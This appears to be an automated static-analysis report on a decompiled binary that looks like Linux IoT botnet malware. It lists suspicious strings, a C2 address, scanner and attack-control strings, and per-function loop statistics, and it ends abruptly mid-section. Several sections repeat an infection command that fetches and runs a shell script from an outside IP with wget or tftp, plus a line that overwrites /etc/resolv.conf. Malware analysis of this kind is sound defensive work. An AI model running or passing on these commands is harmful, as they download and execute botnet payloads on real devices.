=============================================================================
========	BINARY ID :de68e4e8404be3084f4c7859e8de2d0f13c1e648==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :576
SUPSCPECTED LINES COUNT :46
SUPSCPECTED STRINGS COUNT (DISTINCT) :18
SUPSCPECTED STRINGS WEIGHT :65
SUSPECT STRING SCORE : [65 / 150] 43%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :2
DYNAMIC IPs STRINGS COUNT :1
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n
/bin/sh
/proc/cpuinfo
PING
Invalid flag "%s"
GETLOCALIP
KILLATTK
/proc/net/route
%sWelcome to the botnet [%s:%s:%d cores] :)%s
%sCould not connect to commServer!%s\n
SCANNER
SCANNER ON | OFF
SCANNER STOPPED!
attempting to start scanner
SCANNER STARTED!
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
^8PSh
^8PSh
xAPPSh
PPSh
^8PSh
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
185.158.113.30:7
8.8.8.8
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
%d.%d.%d.%d
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
/proc/cpuinfo
/proc/net/route
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 23547
+++TOTAL FUNCTIONS 			:151
+++LINES PER FUNCTION RATIO 	: 155.940397350993
+++SUSPECTED LINES COUNT 	: 230
+++SUSPECTED LINES RATIO 	: 0.976769864526267
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 23547
+++WHILE (TRUE) LINES			: 5244
+++WHILE (TRUE) LINES RATION		:22.2703529111989%
+++WHILE (TRUE) LOOPS COUNT		: 53
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n",
        "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n"
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v15)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
    char (*v16)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";
                    function_8050f60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                        function_8050f60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                    function_8050f60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                        function_8050f60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    int32_t v78 = function_804e450("/proc/cpuinfo", 0); // 0x8048ffa
    int32_t v78 = function_804e450("/proc/cpuinfo", 0); // 0x80491c2
    if (function_804e450("/dev/null", v80) != v78) {
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n",

        "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n"

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

    char (*v15)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";

    char (*v16)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";

                                    function_8048933(v102, (int32_t)"%d.%d.%d.%d", v85 % 256, v104, v84 % 256, v103);

                            function_8048933(v102, (int32_t)"%d.%d.%d.%d", v85 % 256, v104, v84 % 256, v103);

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_8051158                                  |1   |860     |133           |0           |
----------------------------------------------------------------------------------------------
function_804a18e                                  |0   |1363    |14            |1218        |
----------------------------------------------------------------------------------------------
function_804fd76                                  |1   |3421    |7             |2112        |
----------------------------------------------------------------------------------------------
function_8052318                                  |3   |256     |6             |124         |
----------------------------------------------------------------------------------------------
function_80492bb                                  |3   |196     |5             |83          |
----------------------------------------------------------------------------------------------
function_804f744                                  |2   |218     |4             |121         |
----------------------------------------------------------------------------------------------
function_8048fe1                                  |1   |149     |4             |60          |
----------------------------------------------------------------------------------------------
function_8050dd4                                  |4   |431     |4             |101         |
----------------------------------------------------------------------------------------------
function_8048661                                  |3   |374     |3             |273         |
----------------------------------------------------------------------------------------------
function_8048094                                  |0   |90      |3             |0           |
----------------------------------------------------------------------------------------------
function_8052784                                  |4   |138     |2             |48          |
----------------------------------------------------------------------------------------------
function_80519a8                                  |4   |153     |2             |67          |
----------------------------------------------------------------------------------------------
function_80505a5                                  |1   |225     |2             |122         |
----------------------------------------------------------------------------------------------
function_80491a3                                  |0   |109     |2             |17          |
----------------------------------------------------------------------------------------------
function_804835b                                  |1   |138     |2             |55          |
----------------------------------------------------------------------------------------------
function_8048448                                  |4   |421     |2             |28          |
----------------------------------------------------------------------------------------------
function_8051c54                                  |5   |187     |2             |41          |
----------------------------------------------------------------------------------------------
function_805090c                                  |0   |210     |2             |6           |
----------------------------------------------------------------------------------------------
function_804e7b2                                  |0   |131     |2             |31          |
----------------------------------------------------------------------------------------------
function_804e584                                  |4   |117     |2             |0           |
----------------------------------------------------------------------------------------------
function_80498c4                                  |1   |138     |2             |54          |
----------------------------------------------------------------------------------------------
function_8052720                                  |4   |173     |2             |25          |
----------------------------------------------------------------------------------------------
function_805244c                                  |2   |185     |2             |94          |
----------------------------------------------------------------------------------------------
function_8052424                                  |4   |141     |2             |47          |
----------------------------------------------------------------------------------------------
function_805187c                                  |5   |91      |1             |0           |
----------------------------------------------------------------------------------------------
function_804e2cc                                  |1   |91      |1             |0           |
----------------------------------------------------------------------------------------------
function_8049bbe                                  |1   |322     |1             |234         |
----------------------------------------------------------------------------------------------
function_8051357                                  |8   |476     |1             |19          |
----------------------------------------------------------------------------------------------
function_80499cb                                  |0   |174     |1             |84          |
----------------------------------------------------------------------------------------------
function_80516a4                                  |5   |91      |1             |0           |
----------------------------------------------------------------------------------------------
function_804969c                                  |0   |110     |1             |17          |
----------------------------------------------------------------------------------------------
function_804e380                                  |0   |92      |1             |0           |
----------------------------------------------------------------------------------------------
function_804e1c4                                  |0   |81      |1             |0           |
----------------------------------------------------------------------------------------------
function_804e330                                  |1   |92      |1             |0           |
----------------------------------------------------------------------------------------------
function_8048c2c                                  |1   |133     |1             |24          |
----------------------------------------------------------------------------------------------
function_8048522                                  |7   |195     |1             |21          |
----------------------------------------------------------------------------------------------
function_804f6b0                                  |2   |101     |1             |15          |
----------------------------------------------------------------------------------------------
function_804f9c0                                  |2   |104     |1             |17          |
----------------------------------------------------------------------------------------------
function_8048e10                                  |1   |107     |1             |18          |
----------------------------------------------------------------------------------------------
function_8048da1                                  |3   |122     |1             |28          |
----------------------------------------------------------------------------------------------
function_8050c5f                                  |2   |158     |1             |40          |
----------------------------------------------------------------------------------------------
function_804e450                                  |2   |96      |1             |0           |
----------------------------------------------------------------------------------------------
function_804e41c                                  |4   |91      |1             |0           |
----------------------------------------------------------------------------------------------
function_804e3a8                                  |2   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050cf9                                  |4   |118     |0             |0           |
----------------------------------------------------------------------------------------------
function_80522f4                                  |4   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e274                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e4b4                                  |1   |94      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050b24                                  |1   |85      |0             |0           |
----------------------------------------------------------------------------------------------
function_804829b                                  |1   |84      |0             |0           |
----------------------------------------------------------------------------------------------
function_80512e3                                  |0   |94      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e60c                                  |3   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_805250c                                  |1   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fd10                                  |4   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_80522d0                                  |3   |99      |0             |0           |
----------------------------------------------------------------------------------------------
function_80512df                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048120                                  |0   |93      |0             |0           |
----------------------------------------------------------------------------------------------
function_80480b0                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_80517c4                                  |4   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8049f5b                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e4e4                                  |3   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048f7b                                  |2   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_805074d                                  |1   |277     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049491                                  |4   |129     |0             |0           |
----------------------------------------------------------------------------------------------
function_804fd50                                  |0   |99      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e79b                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051738                                  |0   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f6d0                                  |2   |94      |0             |0           |
----------------------------------------------------------------------------------------------
function_80497a1                                  |3   |132     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049f87                                  |2   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e49b                                  |2   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_80481af                                  |0   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048406                                  |2   |92      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e3dc                                  |3   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f9b9                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fc20                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e660                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_804a162                                  |1   |88      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048fb2                                  |1   |100     |0             |0           |
----------------------------------------------------------------------------------------------
function_80524e0                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051618                                  |8   |87      |0             |0           |
----------------------------------------------------------------------------------------------
function_80512e2                                  |2   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051523                                  |4   |114     |0             |0           |
----------------------------------------------------------------------------------------------
function_8052810                                  |0   |99      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fbc8                                  |4   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fbf4                                  |2   |94      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e694                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051788                                  |0   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fa24                                  |1   |87      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f998                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048a46                                  |2   |384     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050a20                                  |1   |87      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e358                                  |3   |87      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050a70                                  |1   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_80523c8                                  |3   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804895b                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051710                                  |0   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804819b                                  |0   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f928                                  |2   |94      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048191                                  |0   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048e54                                  |2   |146     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050f60                                  |5   |106     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051634                                  |2   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8052844                                  |0   |82      |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |1   |85      |0             |0           |
----------------------------------------------------------------------------------------------
function_804a0de                                  |5   |82      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048933                                  |6   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050c01                                  |2   |101     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049251                                  |2   |95      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050acd                                  |3   |86      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fa4c                                  |3   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050db8                                  |3   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e5dc                                  |1   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048982                                  |2   |88      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e628                                  |3   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e738                                  |0   |87      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050b68                                  |2   |107     |0             |0           |
----------------------------------------------------------------------------------------------
function_80508e9                                  |1   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fd30                                  |2   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051317                                  |0   |90      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050518                                  |0   |121     |0             |0           |
----------------------------------------------------------------------------------------------
function_804a026                                  |2   |83      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f9a5                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804822c                                  |1   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_805179c                                  |0   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_80516d8                                  |1   |98      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050ef8                                  |1   |93      |0             |0           |
----------------------------------------------------------------------------------------------
function_805182c                                  |1   |132     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051600                                  |0   |82      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f698                                  |3   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fa0f                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e674                                  |1   |90      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e2fc                                  |2   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051a28                                  |3   |159     |0             |0           |
----------------------------------------------------------------------------------------------
function_80524f8                                  |0   |82      |0             |0           |
----------------------------------------------------------------------------------------------
function_80480c0                                  |0   |111     |0             |0           |
----------------------------------------------------------------------------------------------
function_804fae0                                  |4   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804fb14                                  |4   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e1dc                                  |3   |102     |0             |0           |
----------------------------------------------------------------------------------------------
function_8048110                                  |0   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e51c                                  |5   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e234                                  |4   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f670                                  |3   |91      |0             |0           |
----------------------------------------------------------------------------------------------
unknown_0                                         |1   |0       |0             |0           |
----------------------------------------------------------------------------------------------
function_8050da4                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804faa4                                  |5   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f908                                  |1   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051668                                  |5   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051760                                  |0   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e83c                                  |1   |92      |0             |0           |
----------------------------------------------------------------------------------------------
function_80512a0                                  |0   |121     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_8051158 ===================
++++++++ FUNCTION START 18073
++++++++ FUNCTION END 18933
++++++++ FUNCTION LENGTH 860
        case 0: {
        case 1: {
        case 2: {
        case 3: {
        case 4: {
        case 5: {
        case 6: {
        case 7: {
        case 8: {
        case 9: {
        case 10: {
        case 11: {
        case 12: {
        case 13: {
        case 14: {
        case 15: {
        case 16: {
        case 17: {
        case 18: {
        case 19: {
        case 20: {
        case 21: {
        case 22: {
        case 23: {
        case 24: {
        case 25: {
        case 26: {
        case 27: {
        case 28: {
        case 29: {
        case 30: {
        case 31: {
        case 32: {
        case 33: {
        case 34: {
        case 35: {
        case 36: {
        case 37: {
        case 38: {
        case 39: {
        case 40: {
        case 41: {
        case 42: {
        case 43: {
        case 44: {
        case 45: {
        case 46: {
        case 47: {
        case 48: {
        case 49: {
        case 50: {
        case 51: {
        case 52: {
        case 53: {
        case 54: {
        case 55: {
        case 56: {
        case 57: {
        case 58: {
        case 59: {
        case 60: {
        case 61: {
        case 62: {
        case 63: {
        case 64: {
        case 65: {
        case 66: {
        case 67: {
        case 68: {
        case 69: {
        case 70: {
        case 71: {
        case 72: {
        case 73: {
        case 74: {
        case 75: {
        case 76: {
        case 77: {
        case 78: {
        case 79: {
        case 80: {
        case 81: {
        case 82: {
        case 83: {
        case 84: {
        case 85: {
        case 86: {
        case 87: {
        case 88: {
        case 89: {
        case 90: {
        case 91: {
        case 92: {
        case 93: {
        case 94: {
        case 95: {
        case 96: {
        case 97: {
        case 98: {
        case 99: {
        case 100: {
        case 101: {
        case 102: {
        case 103: {
        case 104: {
        case 105: {
        case 106: {
        case 107: {
        case 108: {
        case 109: {
        case 110: {
        case 111: {
        case 112: {
        case 113: {
        case 114: {
        case 115: {
        case 116: {
        case 117: {
        case 118: {
        case 119: {
        case 120: {
        case 121: {
        case 122: {
        case 123: {
        case 124: {
        case 125: {
        case 126: {
        case 127: {
        case 128: {
        case 129: {
        case 130: {
        case 131: {
        case 149: {
=================FUNCTION : function_804a18e ===================
++++++++ FUNCTION START 5865
++++++++ FUNCTION END 7228
++++++++ FUNCTION LENGTH 1363
        while (true) {
            while (true) {
            while (true) {
                    case 0: {
                    case 1: {
                    case 2: {
                    case 3: {
                    case 4: {
                    case 5: {
                    case 6: {
                    case 7: {
                    case 8: {
            while (true) {
    while (true) {
=================FUNCTION : function_804fd76 ===================
++++++++ FUNCTION START 12058
++++++++ FUNCTION END 15479
++++++++ FUNCTION LENGTH 3421
                while (true) {
                    while (true) {
                            while (true) {
                                    while (true) {
                while (true) {
                while (true) {
            while (true) {
=================FUNCTION : function_8052318 ===================
++++++++ FUNCTION START 22047
++++++++ FUNCTION END 22303
++++++++ FUNCTION LENGTH 256
        while (true) {
            while (true) {
            while (true) {
        while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_80492bb ===================
++++++++ FUNCTION START 4155
++++++++ FUNCTION END 4351
++++++++ FUNCTION LENGTH 196
            while (true) {
                function_8048982(v90, (int32_t)"PING");
                while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_804f744 ===================
++++++++ FUNCTION START 10247
++++++++ FUNCTION END 10465
++++++++ FUNCTION LENGTH 218
    while (true) {
    while (true) {
                while (true) {
            while (true) {
=================FUNCTION : function_8048fe1 ===================
++++++++ FUNCTION START 3793
++++++++ FUNCTION END 3942
++++++++ FUNCTION LENGTH 149
    int32_t v78 = function_804e450("/proc/cpuinfo", 0); // 0x8048ffa
        while (true) {
                while (true) {
                                while (true) {
=================FUNCTION : function_8050dd4 ===================
++++++++ FUNCTION START 17434
++++++++ FUNCTION END 17865
++++++++ FUNCTION LENGTH 431
        while (true) {
            while (true) {
            while (true) {
        while (true) {
=================FUNCTION : function_8048661 ===================
++++++++ FUNCTION START 2064
++++++++ FUNCTION END 2438
++++++++ FUNCTION LENGTH 374
    while (true) {
                    while (true) {
                        while (true) {
=================FUNCTION : function_8048094 ===================
++++++++ FUNCTION START 221
++++++++ FUNCTION END 311
++++++++ FUNCTION LENGTH 90
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v15)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
=================FUNCTION : function_8052784 ===================
++++++++ FUNCTION START 23190
++++++++ FUNCTION END 23328
++++++++ FUNCTION LENGTH 138
    while (true) {
        while (true) {
=================FUNCTION : function_80519a8 ===================
++++++++ FUNCTION START 21353
++++++++ FUNCTION END 21506
++++++++ FUNCTION LENGTH 153
    while (true) {
            while (true) {
=================FUNCTION : function_80505a5 ===================
++++++++ FUNCTION START 15606
++++++++ FUNCTION END 15831
++++++++ FUNCTION LENGTH 225
        while (true) {
                while (true) {
=================FUNCTION : function_80491a3 ===================
++++++++ FUNCTION START 3945
++++++++ FUNCTION END 4054
++++++++ FUNCTION LENGTH 109
    int32_t v78 = function_804e450("/proc/cpuinfo", 0); // 0x80491c2
    while (true) {
=================FUNCTION : function_804835b ===================
++++++++ FUNCTION START 1206
++++++++ FUNCTION END 1344
++++++++ FUNCTION LENGTH 138
    while (true) {
            while (true) {
=================FUNCTION : function_8048448 ===================
++++++++ FUNCTION START 1442
++++++++ FUNCTION END 1863
++++++++ FUNCTION LENGTH 421
                    while (true) {
            while (true) {
=================FUNCTION : function_8051c54 ===================
++++++++ FUNCTION START 21671
++++++++ FUNCTION END 21858
++++++++ FUNCTION LENGTH 187
        while (true) {
    while (true) {
=================FUNCTION : function_805090c ===================
++++++++ FUNCTION START 16198
++++++++ FUNCTION END 16408
++++++++ FUNCTION LENGTH 210
        while (true) {
    while (true) {
=================FUNCTION : function_804e7b2 ===================
++++++++ FUNCTION START 9639
++++++++ FUNCTION END 9770
++++++++ FUNCTION LENGTH 131
        while (true) {
    while (true) {
=================FUNCTION : function_804e584 ===================
++++++++ FUNCTION START 8815
++++++++ FUNCTION END 8932
++++++++ FUNCTION LENGTH 117
        v79 = sigprocmask(how, set, oset);
    v79 = sigprocmask(how, set, oset);
=================FUNCTION : function_80498c4 ===================
++++++++ FUNCTION START 4734
++++++++ FUNCTION END 4872
++++++++ FUNCTION LENGTH 138
    while (true) {
        while (true) {
=================FUNCTION : function_8052720 ===================
++++++++ FUNCTION START 23014
++++++++ FUNCTION END 23187
++++++++ FUNCTION LENGTH 173
        while (true) {
    while (true) {
=================FUNCTION : function_805244c ===================
++++++++ FUNCTION START 22563
++++++++ FUNCTION END 22748
++++++++ FUNCTION LENGTH 185
        while (true) {
            while (true) {
=================FUNCTION : function_8052424 ===================
++++++++ FUNCTION START 22419
++++++++ FUNCTION END 22560
++++++++ FUNCTION LENGTH 141
    while (true) {
            while (true) {
=================FUNCTION : function_805187c ===================
++++++++ FUNCTION START 21259
++++++++ FUNCTION END 21350
++++++++ FUNCTION LENGTH 91
    int32_t v78 = wait4(pid, status, options, rusage); // 0x8051899
=================FUNCTION : function_804e2cc ===================
++++++++ FUNCTION START 7598
++++++++ FUNCTION END 7689
++++++++ FUNCTION LENGTH 91
    int32_t v78 = close(fd); // 0x804e2dc
=================FUNCTION : function_8049bbe ===================
++++++++ FUNCTION START 5052
++++++++ FUNCTION END 5374
++++++++ FUNCTION LENGTH 322
    while (true) {
=================FUNCTION : function_8051357 ===================
++++++++ FUNCTION START 19417
++++++++ FUNCTION END 19893
++++++++ FUNCTION LENGTH 476
        while (true) {
=================FUNCTION : function_80499cb ===================
++++++++ FUNCTION START 4875
++++++++ FUNCTION END 5049
++++++++ FUNCTION LENGTH 174
        while (true) {
=================FUNCTION : function_80516a4 ===================
++++++++ FUNCTION START 20376
++++++++ FUNCTION END 20467
++++++++ FUNCTION LENGTH 91
    int32_t v78 = clock_getres(clk_id, res); // 0x80516b7
=================FUNCTION : function_804969c ===================
++++++++ FUNCTION START 4486
++++++++ FUNCTION END 4596
++++++++ FUNCTION LENGTH 110
        while (true) {
=================FUNCTION : function_804e380 ===================
++++++++ FUNCTION START 7971
++++++++ FUNCTION END 8063
++++++++ FUNCTION LENGTH 92
    int32_t pid = getpid(v78); // 0x804e389
=================FUNCTION : function_804e1c4 ===================
++++++++ FUNCTION START 7231
++++++++ FUNCTION END 7312
++++++++ FUNCTION LENGTH 81
    uint32_t result = vfork(); // 0x804e1ca
=================FUNCTION : function_804e330 ===================
++++++++ FUNCTION START 7786
++++++++ FUNCTION END 7878
++++++++ FUNCTION LENGTH 92
    int32_t v79 = fork(v78); // 0x804e339
=================FUNCTION : function_8048c2c ===================
++++++++ FUNCTION START 3086
++++++++ FUNCTION END 3219
++++++++ FUNCTION LENGTH 133
        while (true) {
=================FUNCTION : function_8048522 ===================
++++++++ FUNCTION START 1866
++++++++ FUNCTION END 2061
++++++++ FUNCTION LENGTH 195
            while (true) {
=================FUNCTION : function_804f6b0 ===================
++++++++ FUNCTION START 10046
++++++++ FUNCTION END 10147
++++++++ FUNCTION LENGTH 101
    while (true) {
=================FUNCTION : function_804f9c0 ===================
++++++++ FUNCTION START 10897
++++++++ FUNCTION END 11001
++++++++ FUNCTION LENGTH 104
    while (true) {
=================FUNCTION : function_8048e10 ===================
++++++++ FUNCTION START 3347
++++++++ FUNCTION END 3454
++++++++ FUNCTION LENGTH 107
    while (true) {
=================FUNCTION : function_8048da1 ===================
++++++++ FUNCTION START 3222
++++++++ FUNCTION END 3344
++++++++ FUNCTION LENGTH 122
    while (true) {
=================FUNCTION : function_8050c5f ===================
++++++++ FUNCTION START 16986
++++++++ FUNCTION END 17144
++++++++ FUNCTION LENGTH 158
            while (true) {
=================FUNCTION : function_804e450 ===================
++++++++ FUNCTION START 8348
++++++++ FUNCTION END 8444
++++++++ FUNCTION LENGTH 96
    int32_t fd = open(path, 0x1000000 * a2 / 0x1000000); // 0x804e47b
=================FUNCTION : function_804e41c ===================
++++++++ FUNCTION START 8254
++++++++ FUNCTION END 8345
++++++++ FUNCTION LENGTH 91
    int32_t v78 = kill(pid, sig_num); // 0x804e42f
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 1 @ function_804835b ====================================
++++++++ WHILE START : 1288 
++++++++ WHILE FUNCTION : function_804835b 
++++++++ WHILE END : 1343 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 5 @ function_8048661 ====================================
++++++++ WHILE START : 2157 
++++++++ WHILE FUNCTION : function_8048661 
++++++++ WHILE END : 2430 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 9 @ function_8048fe1 ====================================
++++++++ WHILE START : 3875 
++++++++ WHILE FUNCTION : function_8048fe1 
++++++++ WHILE END : 3935 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 11 @ function_80492bb ====================================
++++++++ WHILE START : 4253 
++++++++ WHILE FUNCTION : function_80492bb 
++++++++ WHILE END : 4314 
++++++++ INTRESTING INSTRUCTIONS :  
		function_8048982(v90, (int32_t)"PING");
		while (true) {
=============================WHILE LOOPS ID : 15 @ function_80498c4 ====================================
++++++++ WHILE START : 4817 
++++++++ WHILE FUNCTION : function_80498c4 
++++++++ WHILE END : 4871 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 18 @ function_804a18e ====================================
++++++++ WHILE START : 5995 
++++++++ WHILE FUNCTION : function_804a18e 
++++++++ WHILE END : 7209 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		case 0: {
		case 1: {
		case 2: {
		case 3: {
		case 4: {
		case 5: {
		case 6: {
		case 7: {
		case 8: {
		while (true) {
=============================WHILE LOOPS ID : 24 @ function_804f744 ====================================
++++++++ WHILE START : 10360 
++++++++ WHILE FUNCTION : function_804f744 
++++++++ WHILE END : 10464 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 27 @ function_804fd76 ====================================
